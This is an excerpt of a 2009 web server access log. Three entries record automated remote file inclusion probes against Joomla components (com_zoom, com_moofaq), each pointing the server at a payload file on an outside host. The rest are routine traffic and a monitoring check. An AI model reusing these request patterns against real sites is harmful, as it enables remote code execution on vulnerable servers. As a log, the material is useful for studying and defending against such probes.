202.125.45.45 - - [28/Jul/2009:00:37:20 -0400] "GET /logs/access_log.Q109070500/index.php?_REQUEST=&_REQUEST[option]=option,com_zoom&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:38:19 -0400] "GET /logs/access_log.Q109051000%20/index.php?_REQUEST=&_REQUEST[option]=option,com_zoom&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
125.248.88.155 - - [28/Jul/2009:00:38:58 -0400] "GET /logs/access_log.Q109063000//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.anyche.com/goods_img1/satu.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:00:40:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
96.246.5.61 - - [28/Jul/2009:00:41:27 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
96.246.5.61 - - [28/Jul/2009:00:41:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
96.246.5.61 - - [28/Jul/2009:00:41:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
96.246.5.61 - - [28/Jul/2009:00:41:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
